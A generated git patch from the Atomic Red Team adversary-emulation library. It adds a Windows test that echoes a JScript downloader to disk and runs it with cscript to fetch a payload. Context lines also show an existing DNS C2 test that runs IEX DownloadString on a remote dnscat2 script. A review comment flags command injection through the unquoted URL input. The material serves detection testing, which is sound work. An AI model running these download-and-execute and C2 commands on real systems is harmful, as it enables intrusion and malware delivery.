From ab2c18b19df19b8fb4bde2b570fdc832216d15fc Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Sat, 29 Feb 2020 21:59:49 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1071/T1071.md | 35 +++++++++++++++++++++++++++++++++++ atomics/index.md | 1 + atomics/index.yaml | 28 +++++++++++++++++++++++++++- atomics/windows-index.md | 1 + 4 files changed, 64 insertions(+), 1 deletion(-) diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md index 68db267a..ff74708f 100644 --- a/atomics/T1071/T1071.md +++ b/atomics/T1071/T1071.md @@ -20,6 +20,8 @@ For connections that occur internally within an enclave (such as those between a - [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2) +- [Atomic Test #8 - OSTap Payload Download](#atomic-test-8---ostap-payload-download) +
@@ -227,4 +229,37 @@ Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip} +
+
+ +## Atomic Test #8 - OSTap Payload Download +Uses cscript //E:jscript to download a file + +**Supported Platforms:** Windows + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js| +| file_url | URL to retrieve file from | Url | https://www.w3.org/TR/PNG/iso_8859-1.txt| +| out_file | File to download payload to | Path | T1071-Out.txt| + + +#### Attack Commands: Run with `command_prompt`! +``` +echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} +cscript //E:Jscript #{script_file} +``` + +#### Cleanup Commands: +``` +del #{script_file} /F /Q +del #{out_file} /F /Q +``` + + + + +
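Review bot: The attack command on the `echo ... > #{script_file}` line splices `#{file_url}` and `#{out_file}` into a cmd.exe command line unquoted, so a URL containing cmd metacharacters (`&`, `|`, `<`, `>`, `^`, as in any query string) is interpreted by cmd before it reaches the .js file — the dropper is truncated and whatever follows `&` runs as a separate command. Inputs are operator-supplied, so this is a robustness caveat rather than an exploit, but it belongs on the input row: `| file_url | URL to retrieve file from (must not contain cmd.exe metacharacters & \| < > ^ — the value is echoed unquoted into the .js file) | Url | https://www.w3.org/TR/PNG/iso_8859-1.txt|`. The `out_file` default `T1071-Out.txt` is relative to the executor's working directory while `script_file` is anchored in `%TEMP%`, so `del #{out_file} /F /Q` in the cleanup silently misses the artifact if the cleanup runs from a different directory; `%TEMP%\T1071-Out.txt` keeps both artifacts in one known location. `fso = WScript.CreateObject('Scripting.FileSystemObject')` is instantiated but never referenced in the script and can be removed from the echo line.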
diff --git a/atomics/index.md b/atomics/index.md index 983670ff..91d7161a 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -977,6 +977,7 @@ - Atomic Test #5: DNS Regular Beaconing [windows] - Atomic Test #6: DNS Long Domain Query [windows] - Atomic Test #7: DNS C2 [windows] + - Atomic Test #8: OSTap Payload Download [windows] - [T1032 Standard Cryptographic Protocol](./T1032/T1032.md) - Atomic Test #1: OpenSSL C2 [windows] - [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index e94a31bc..d6b31bba 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -27868,9 +27868,35 @@ command-and-control: executor: name: powershell elevation_required: false - command: |- + command: | IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1') Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip} + - name: OSTap Payload Download + description: 'Uses cscript //E:jscript to download a file + +' + supported_platforms: + - windows + input_arguments: + script_file: + description: File to execute jscript code from + type: Path + default: "%TEMP%\\OSTapGet.js" + file_url: + description: URL to retrieve file from + type: Url + default: https://www.w3.org/TR/PNG/iso_8859-1.txt + out_file: + description: File to download payload to + type: Path + default: T1071-Out.txt + executor: + name: command_prompt + elevation_required: false + command: | + echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} + cscript //E:Jscript #{script_file} + cleanup_command: "del #{script_file} /F /Q\ndel #{out_file} /F /Q " T1032: technique: x_mitre_data_sources: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 445bbb0e..c5dd61b2 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md 
@@ -724,6 +724,7 @@ - Atomic Test #5: DNS Regular Beaconing [windows] - Atomic Test #6: DNS Long Domain Query [windows] - Atomic Test #7: DNS C2 [windows] + - Atomic Test #8: OSTap Payload Download [windows] - [T1032 Standard Cryptographic Protocol](./T1032/T1032.md) - Atomic Test #1: OpenSSL C2 [windows] - [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md)